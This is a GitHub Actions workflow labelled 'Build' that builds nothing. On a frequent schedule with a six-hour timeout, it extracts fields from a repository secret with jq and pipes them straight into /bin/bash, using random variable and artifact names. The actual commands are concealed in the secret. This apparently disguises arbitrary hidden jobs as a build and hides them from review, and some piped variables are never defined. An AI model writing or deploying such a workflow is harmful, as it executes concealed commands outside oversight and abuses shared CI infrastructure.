name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '4 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          gur6: ${{ secrets.gur6 }}
        run: |
          printf '%s' "$gur6" | jq -r .snu6784 | /bin/bash
          echo $ggkxe1 | jq -r .l7 | /bin/bash
          printf '%s' "$jbw7" | jq -r .albw6541 | /bin/bash
          echo $m3025 | jq -r .ie91982 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: nkbCpZgB
          path: "*.zip"
          retention-days: 1
